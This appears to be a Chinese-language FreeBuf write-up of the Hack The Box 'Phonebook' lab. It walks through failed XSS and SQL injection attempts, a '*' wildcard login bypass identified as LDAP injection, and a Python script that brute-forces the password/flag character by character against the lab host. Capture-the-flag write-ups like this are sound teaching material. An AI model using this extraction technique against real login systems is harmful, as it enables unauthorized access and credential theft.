freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

HTB之Phonebook
2023-01-07 14:34:49
所属地 重庆

前言

渗透小白第一次投稿,希望各位大佬多多包涵。这是一个简单的靶场渗透测试。

渗透过程

访问网址发现是一个登录界面和一段文字:1673069385_63b903498800493f34a37.png!small?1673069386186

这句话应该是给我们提示登录的账号,使用Reese账号尝试万能密码绕过,失败:1673069528_63b903d82f84c3921729f.png!small?1673069528969

但是发现页面回显message内容,怀疑存在XSS漏洞:1673070014_63b905bea5700bd7010bc.png!small?1673070015320

应该是存在XSS漏洞的,恶意代码已经插入网页,但不知道为啥没有弹窗,因为是self-XSS利用价值不大所以没有去深究。

猜想登录存在SQL注入,尝试使用“'”,“"”,”and 1=1“,”and 1=2“等去触发SQL语句的报错或绕过登录均失败。

扫描网站目录发现只存在当前目录:

1673070829_63b908ed3eb106793e2e8.png!small?1673070830711

查看网页源代码看有不有什么有用的东西,发现存在一个存放CSS脚本的目录,尝试访问,竟然进了后台:

1673070616_63b90818bd3ec6eac2ab0.png!small?1673070617524

1673070785_63b908c1765e7c56fd381.png!small?1673070786040

尝试使用搜索功能,提示没有权限,白高兴一场,看来还是需要绕过登录限制:

1673070938_63b9095a08fdc1bd42f1a.png!small?1673070938765

想了一下,系统给出用户名的提示,应该是想让我们去爆破密码,于是用了密码字典和fuzz字典测试,发现用*可以绕过登录:

1673072272_63b90e9003aa73fe6ddbd.png!small?1673072272696

成功绕过登录进入后台,发现只有一个搜索框,发现是使用JSON格式发送的数据查询,尝试JSON注入,失败:

1673072447_63b90f3f5ac9028806194.png!small?1673072447926

于是在网上搜索关于*绕过相关,发现是LDAP注入,*可以直接匹配数据,猜测flag应该是登录密码,尝试使用H*登录,成功,那么flag应该就是登录密码,于是我自己写了个脚本成功拿到flag,脚本如下:

import requests
import string
flag = ''
wl = ''
wordlist = string.ascii_lowercase + string.ascii_uppercase + '0123456789_}'
while 1:
for i in wordlist:
wl = flag+i
url = 'http://178.128.37.153:32155/login'
value = {'username':'Reese','password':wl+'*'}
response = requests.post(url,value)
if response.headers['Content-Length'] == '2586':
flag = wl
print(flag)
break
if i=='}':
break
# 渗透测试
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录